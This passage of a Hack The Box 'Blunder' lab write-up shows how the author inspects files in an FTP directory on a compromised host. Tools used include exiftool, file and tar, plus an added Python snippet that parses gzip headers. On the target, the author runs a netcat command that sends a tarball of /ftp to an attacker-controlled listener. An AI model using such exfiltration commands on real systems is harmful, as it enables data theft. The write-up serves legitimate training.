FTP
I initially found the target FTP instance very strange, as it was included in the returned Nmap data despite its state being “closed”. At a later stage, a note present on the web server revealed that the FTP instance was intended to be closed by the admins
Upon gaining a foothold on the target system, PEAS reminded me of the FTP instance and its presence
www-data@blunder:/$ ll ftp
total 11M
4.0K drwxr-xr-x 21 root root 4.0K Jul 6 2021 ..
4.0K drwxr-xr-x 2 nobody nogroup 4.0K Nov 27 2019 .
4.0K -rw-r--r-- 1 root root 260 Nov 27 2019 note.txt
4.0K -rw-r--r-- 1 root root 828 Nov 27 2019 config.json
11M -rw-r--r-- 1 root root 11M Nov 27 2019 D5100_EN.pdf
268K -rw-r--r-- 1 root root 265K Nov 27 2019 config
There are 4 files within the “unexpected” FTP directory; /ftp
www-data@blunder:/dev/shm$ tar -czf ftp.tar.gz ./ftp
www-data@blunder:/dev/shm$ nc 10.10.14.17 2222 < ./ftp.tar.gz
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ nnc 2222 > ftp.tar.gz
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 55254
I will transfer them all to Kali for detailed examination
┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ tar -xf ftp.tar.gz
Extracting content
note.txt
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ cat note.txt
Hey Sophie
I've left the thing you're looking for in here for you to continue my work
when I leave. The other thing is the same although Ive left it elsewhere too.
Its using the method we talked about; dont leave it on a post-it note this time!
Thanks
Shaun
The note.txt file is a note to someone named Sophie, left by the shaun user
The note itself appears to be very vague as context is missing
config.json
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ cat config.json
{
"squadname": "Super hero squad",
"hometown": "Metro City",
"formed": 2016,
"secretbase": "Super tower",
"active": true,
"members": [
{
"name": "Molecule Man",
"age": 29,
"secretidentity": "Dan Jukes",
"powers": [
"Radiation resistance",
"Turning tiny",
"Radiation blast"
]
},
{
"name": "Madame Uppercut",
"age": 39,
"secretidentity": "Jane Wilson",
"powers": [
"Million tonne punch",
"Damage resistance",
"Superhuman reflexes"
]
},
{
"name": "Eternal Flame",
"age": 1000000,
"secretidentity": "Unknown",
"powers": [
"Immortality",
"Heat Immunity",
"Inferno",
"Teleportation",
"Interdimensional travel"
]
}
]
}
The config.json file contains some arbitrary text
D5100_EN.pdf
The D5100_EN.pdf file is an official User’s Manual for the D5100 DSLR camera
Metadata
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ exiftool D5100_EN.pdf
exiftool version number : 12.65
file name : D5100_EN.pdf
directory : .
file size : 11 MB
file modification date/time : 2023:09:18 08:55:41+02:00
file access date/time : 2023:09:18 14:54:12+02:00
file inode change date/time : 2023:09:18 14:51:36+02:00
file permissions : -rw-r--r--
file type : PDF
file type extension : pdf
mime type : application/pdf
pdf version : 1.4
linearized : No
page mode : UseOutlines
xmp toolkit : 3.1-702
producer : Acrobat Distiller 7.0 (Windows)
creator tool : PScript5.dll Version 5.2.2
modify date : 2011:07:19 18:20:03+09:00
create date : 2011:02:07 14:01:37+09:00
metadata date : 2011:07:19 18:20:03+09:00
document id : uuid:aedc180a-9fd9-481c-a613-3831cddfe7f8
instance id : uuid:b1b06c89-d3ae-49af-a9f7-884953ea7d7d
format : application/pdf
title :
creator : Nikon Corporation
page count : 92
page layout : SinglePage
author : Nikon Corporation
warning : [Minor] Ignored duplicate Info dictionary
config
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ file config
config: gzip compressed data, from Unix, original size modulo 2^32 286720
The config file is rather interesting as it contains a long string of binary data
It seems to be an archive file
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ cp config config.tar.gz ; tar -xvf config.tar.gz
buzz.wav
The archive contains a single WAV file; buzz.wav
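The fields that file reported for config (gzip data, "from Unix", original size modulo 2^32) live in the gzip header and trailer. The Python below is an added example, not part of the original notes: it reads those fields directly and lists the inner tar members in memory, with a size ceiling, instead of extracting to disk. The archive it inspects is constructed in the code as a stand-in for config; the function names are hypothetical.

```python
import gzip
import io
import struct
import tarfile

GZIP_MAGIC = b"\x1f\x8b"
OS_NAMES = {0: "FAT", 3: "Unix", 11: "NTFS", 255: "unknown"}

def gzip_summary(blob: bytes) -> dict:
    """Parse the fixed 10-byte gzip header and 8-byte trailer (RFC 1952)."""
    if len(blob) < 18 or blob[:2] != GZIP_MAGIC:
        raise ValueError("not a gzip stream")
    method, flags, mtime, _xfl, os_id = struct.unpack("<BBIBB", blob[2:10])
    # The trailer is attacker-controlled metadata: treat ISIZE as a hint only.
    _crc32, isize = struct.unpack("<II", blob[-8:])
    return {
        "method": "deflate" if method == 8 else f"unknown({method})",
        "has_name": bool(flags & 0x08),   # FNAME: original file name stored
        "mtime": mtime,
        "os": OS_NAMES.get(os_id, str(os_id)),
        "isize": isize,                   # original size modulo 2^32
    }

def inner_members(blob: bytes, max_bytes: int = 64 * 1024 * 1024) -> list:
    """Decompress with a size ceiling, then list tar members without extracting."""
    with gzip.GzipFile(fileobj=io.BytesIO(blob)) as gz:
        data = gz.read(max_bytes + 1)
    if len(data) > max_bytes:
        raise ValueError("decompressed size exceeds ceiling")
    if data[257:262] != b"ustar":
        return []                         # plain gzip, not a tarball
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        return [(m.name, m.size, m.isfile()) for m in tar.getmembers()]

def build_sample() -> bytes:
    """Constructed stand-in for the extensionless `config` file on the page."""
    payload = b"RIFF" + b"\x00" * 60      # placeholder bytes, not real audio
    raw = io.BytesIO()
    with tarfile.open(fileobj=raw, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        info = tarfile.TarInfo("buzz.wav")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    out = io.BytesIO()
    with gzip.GzipFile(fileobj=out, mode="wb", mtime=0) as gz:
        gz.write(raw.getvalue())
    return out.getvalue()

if __name__ == "__main__":
    print(gzip_summary(build_sample()), inner_members(build_sample()))
```

Listing members this way also shows each entry's name and type before anything is written, so an absolute path, a `..` component or a link entry is visible up front.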
buzz.wav
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ open buzz.wav
VLC media player 3.0.18 Vetinari (revision 3.0.13-8-g41878ff4f2)
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ [000055b9c4326550] main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface.
The buzz.wav file contains nothing informative, only white noise
Metadata
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ exiftool buzz.wav
ExifTool Version Number : 12.65
File Name : buzz.wav
Directory : .
File Size : 284 kB
File Modification Date/Time : 2019:11:27 12:30:04+01:00
File Access Date/Time : 2023:09:18 14:59:29+02:00
File Inode Change Date/Time : 2023:09:18 14:59:01+02:00
File Permissions : -rw-r--r--
File Type : WAV
File Type Extension : wav
MIME Type : audio/x-wav
Encoding : Microsoft PCM
Num Channels : 2
Sample Rate : 44100
Avg Bytes Per Sec : 176400
Bits Per Sample : 16
Manufacturer : 0
Product : 0
Sample Period : 22676
MIDI Unity Note : 60
MIDI Pitch Fraction : 0
SMPTE Format : none
SMPTE Offset : 00:00:00:00
Num Sample Loops : 1
Sampler Data Len : 0
Sampler Data : (Binary data 20 bytes, use -b option to extract)
Acidizer Flags : Stretch
Root Note : High C
Beats : 4
Meter : 4/4
Tempo : 150
Software : FL Studio 10
Duration : 1.61 s
┌──(kali㉿kali)-[~/…/htb/labs/blunder/ftp]
└─$ exiftool -b buzz.wav
12.65buzz.wav.2838902019:11:27 12:30:04+01:002023:09:18 14:59:29+02:002023:09:18 14:59:01+02:00100644WAVWAVaudio/x-wav1244100176400160022676600000:00:00:0010�46044 4150FL Studio 101.6093537414966